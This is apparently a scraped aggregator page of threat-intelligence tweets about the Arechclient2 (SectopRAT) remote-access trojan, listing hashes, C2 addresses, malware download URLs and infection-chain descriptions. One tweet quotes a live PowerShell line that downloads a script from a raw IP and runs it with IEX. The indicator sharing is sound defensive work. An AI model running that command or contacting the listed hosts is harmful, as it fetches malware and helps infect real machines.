Top Tweets for #Arechclient2
📌 Zararlı PDF'ler, Türkiye'yi doğrudan hedef alıyor.
IoC’ler:
• c28f8fa5f0cb8c6a942b6b7f1884dcf5
• c6c3194a1f081ab7dc840cbf588e2ef4
• 176[.]65[.]132[.]6
• evgshippingline[.]com
#StealC - #Vidar - #ArechClient2 - #SectopRAT
kaynak: @kaspersky
IoC claim: @malpulse
![skocherhan's tweet photo. 36[.]255[.]98[.]59:9000/wbinjget
AS208137 Feo Prest SRL 🇹🇼
#Arechclient2 #SecTopRAT #RedlineStealer https://t.co/uHWjmuxj5P](https://pbs.twimg.com/media/G6WaEl-WcAAQjLD.png)
![skocherhan's tweet photo. 107[.]189[.]21[.]86:9000/wbinjget
AS14956 ROUTERHOSTING 🇳🇱
#Arechclient2 #SecTopRAT https://t.co/pq55gL2bvo](https://pbs.twimg.com/media/G6VbZnoW8AA1g-9.png)
2025-08-15 (Friday): #LummaStealer infection leads to #SectopRAT (#ArechClient2). Details at https://t.co/V3kqDD6I37
#ClickFix -> #GHOSTPULSE -> #ARECHCLIENT2
Observed a Clickfix campaign on a compromised site that follows the same infection chain documented by Elastic a few days ago...
Ghostpulse extracted: d6b1f2a67270a2e955aaf5cd1ad60ce0303f140479cc882a3ab8e623f76b1f81
#elastic
HOST-BANNER_0_HASH: `82cddf3a9bff315d8fc708e5f5f85f20`
Looks like a solid predictive indicator for #ARECHCLIENT2/#SECTOPRAT redirector infra.
CC: @500mk500, @SreekarMad, @ValidinLLC
#GHOSTPULSE
New research from #ElasticSecurityLabs uncovers a new ClickFix campaign! Learn how attackers are using GHOSTPULSE and ARECHCLIENT2 (SECTOPRAT) in multi-stage attacks to deploy RATs and steal data. Stay informed: https://t.co/ndKdRIj76P
@daniel_sloof @petikvx @500mk500 @malwrhunterteam @abuse_ch @VirITeXplorer @marsomx_ @1ZRR4H @AndreaDraghetti @0xToxin @pr0xylife I uploaded some samples
👇
https://t.co/jQXYwkXME1
👇
#LummaStealer
#ArechClient2
#HijackLoader
#XenoRAT
#RemcosRAT
#Stealc
#Aurotun
#ShadowLadder
#Arechclient2 (LNK from #Ukraine) dropping this one with two malicious DLL's:
hxxp://195.82.147(.)93/adm005/033025-ll/husbandspecific.zip @abuse_ch
https://t.co/YcCCHfl3xh
C2: 45.141.84(.)229 (RU)
Original LNK: https://t.co/rPv5asDYQi
6c0511faea7ad1018ef12ee991d8827c
trusthostme[.]com/cgi-bin/
appsupportme[.]com/cgi-bin/
#opendir #Arechclient2
![skocherhan's tweet photo. 6c0511faea7ad1018ef12ee991d8827c
trusthostme[.]com/cgi-bin/
appsupportme[.]com/cgi-bin/
#opendir #Arechclient2 https://t.co/0Mt2oZWq5f](https://pbs.twimg.com/media/GrpBaH8WQAA-9_Z.jpg)
Arechclient2 Malware Analysis (sectopRAT) #Arechclient2 #MalwareAnalysis #Phishing #EmailScams #CybersecurityBlog https://t.co/5d7RDReQH2
Related Samples
#SectopRAT #arechclient2 92.255.85[.]36
👇
https://t.co/NMC8Co4eQj
cc @smica83 @500mk500 @spektrumdj
![JAMESWT_WT's tweet photo. Related Samples
#SectopRAT #arechclient2 92.255.85[.]36
👇
https://t.co/NMC8Co4eQj
cc @smica83 @500mk500 @spektrumdj https://t.co/LQKqhniBNm](https://pbs.twimg.com/media/GkDcV87XIAApdMC.jpg)
The Base64 string:
$New-Object Net.WebClient).DownloadString(‘http://216.238.90.145/w/koa’) | IEX
Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500
![JAMESWT_WT's tweet photo. Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500 https://t.co/q5sAf1PPXf](https://pbs.twimg.com/media/GiX6Uv4WYAAKG0z.jpg)
![JAMESWT_WT's tweet photo. Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500 https://t.co/q5sAf1PPXf](https://pbs.twimg.com/media/GiX6Is1XAAAjaqh.jpg)
![JAMESWT_WT's tweet photo. Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500 https://t.co/q5sAf1PPXf](https://pbs.twimg.com/media/GiX6IAhXIAAxj7G.jpg)
![JAMESWT_WT's tweet photo. Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500 https://t.co/q5sAf1PPXf](https://pbs.twimg.com/media/GiX5pDzXQAA_ecE.jpg)
@James_inthe_box #netsupport #rat Related Samples Uploaded
*.exe>*.part01.exe to *.part*.rar >netsupport
MD5 5f38d7a73e9550147d3c10a036985a72
client32.ini 2025-01-22
MD5 7067af414215ee4c50bfcd3ea43c84f0
NSM.LIC 2019-08-05
Samples
https://t.co/uipKzIr08L
https://t.co/toWEkck2uh
cc @500mk500
👾 #Arechclient2, also known as #SectopRAT, is a Remote Access #Trojan active since 2019
It leverages scripts and process injection to infect systems, stealing browser and #crypto wallet data
Learn more and get fresh #IOCs & samples
🔗 https://t.co/67onHOJupo
docu-signer[.]com
👇Samples
https://t.co/jN9QTYOe0n
⛔️https://docu-signer.]com/api/uz/0912545164/
updater.bin autoit
log4cxx.dll a3x config
#Arechclient2 Backdoor/SecTopRAT Related Activity
C2
⛔️185.147.124.236[:9000
❇️https://t.co/LMAHRSbomJ
h/t @malwrhunterteam
![JAMESWT_WT's tweet photo. docu-signer[.]com
👇Samples
https://t.co/jN9QTYOe0n
⛔️https://docu-signer.]com/api/uz/0912545164/
updater.bin autoit
log4cxx.dll a3x config
#Arechclient2 Backdoor/SecTopRAT Related Activity
C2
⛔️185.147.124.236[:9000
❇️https://t.co/LMAHRSbomJ
h/t @malwrhunterteam https://t.co/uCAOe1VgNK](https://pbs.twimg.com/media/Ge-9J-UX0AAHLj3.jpg)
⚠️ #Emmenhtal #loader uses #LOLBAS to deliver #malware as part of an ongoing campaign
📝 So far, we found #Arechclient2, #Lumma, #Hijackloader, and #Amadey being delivered by Emmenhtal. Each sample makes heavy use of malicious scripts.
⚙️ You can see what these #scripts do using #ANRUN’s Script Tracer:
First sample of this campaign we discovered: https://t.co/zcbwB2Vjy0
Arechclient2: https://t.co/vOkTHrXNZW
Lumma: https://t.co/6452M7Yodj
Amadey: https://t.co/qLlCuDG9AS
Hijackloader: https://t.co/3G1eUpYCtS
🔗 Execution chain:
#LNK initiates #Forfiles ➡️ #Forfiles locates #HelpPane ➡️ PowerShell launches #Mshta with the AES-encrypted first-stage #payload ➡️ Mshta decrypts and executes the downloaded #payload ➡️ #PowerShell runs an #AES-encrypted command to decrypt #Emmenhtal
➡️ The final PowerShell script is the #Emmenhtal loader which launches a payload (often Updater.exe) with a binary file with a generated name as an argument ➡️ Malware infects the system
🕵️ CyberChef recipe:
https://t.co/gnSFZiTAfs
💢 TI Lookup queries to find more Emmenhtal samples:
https://t.co/m20Ba9hRyn
https://t.co/6QJR1zSmqD
💡 Stay tuned for more insights!
#SectopRAT, aka #ArechClient2 is being delivered via #Lumma Stealer drops.
C2⚙️ #SectopRAT
95.143.190.57:15648
Isolated analysis
👇👇
https://t.co/ercSkdDeNN
Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647
![RussianPanda9xx's tweet photo. Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647](https://pbs.twimg.com/media/FwTEJ6dXsAIYCgX.jpg)
![RussianPanda9xx's tweet photo. Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647](https://pbs.twimg.com/media/FwTEJ5cXoAA-5Mb.jpg)
![RussianPanda9xx's tweet photo. Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647](https://pbs.twimg.com/media/FwTEJ4PXwAMq_tF.jpg)
![RussianPanda9xx's tweet photo. Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647](https://pbs.twimg.com/media/FwTEJ20WAAInzi6.png)
I just released a #Blockpost on my recent investigation into a highly obfuscated #Stealer Sample, which turned out to be #SectopRat / #ArechClient2.
It was a wild run and I decided I want to share it with #infosec :)
https://t.co/tFrhESJbz1
2/ #Arechclient2 C2 (https://t.co/wVO2n3qwbk) is also mentioned in this great analysis by @dr4k0nia (plus, an additional server with opendir and +18000 files, possibly the stealer's encrypted logs) 👇
/cc: @Gi7w0rm @abuse_ch
https://t.co/A2Iu4DkqC3
Quick update, extracted some stuff from the .NET stealer payload.
C2:
hxxps://pastebin.com/raw/NdY0fAXm
34.107.35.186:15647
other related IPs:
77.73.133.83
104.20.68.143:443
String dump: https://t.co/cgY4JksFEM
#threatintell #stealer #opendir
Last Seen Hashtags on Sotwe
ParmaClub
Seen from United States
Teenage nolimit _
Seen from United States
fnfnsfw #gay
Seen from Netherlands
fnf gay sex
Seen from Netherlands
รับงานเชียงราย
Seen from Thailand
mieaya
Seen from United States
themixnerd
Seen from United States
xlii or #exny or #momson or #nolimit() +filter:native_video
Seen from Algeria
ख़ालसा
Seen from United States
dogman
Seen from Spain
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.5M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
73M followers
Virat Kohli
@imvkohli
69.8M followers
Kim Kardashian
@kimkardashian
69.8M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.9M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers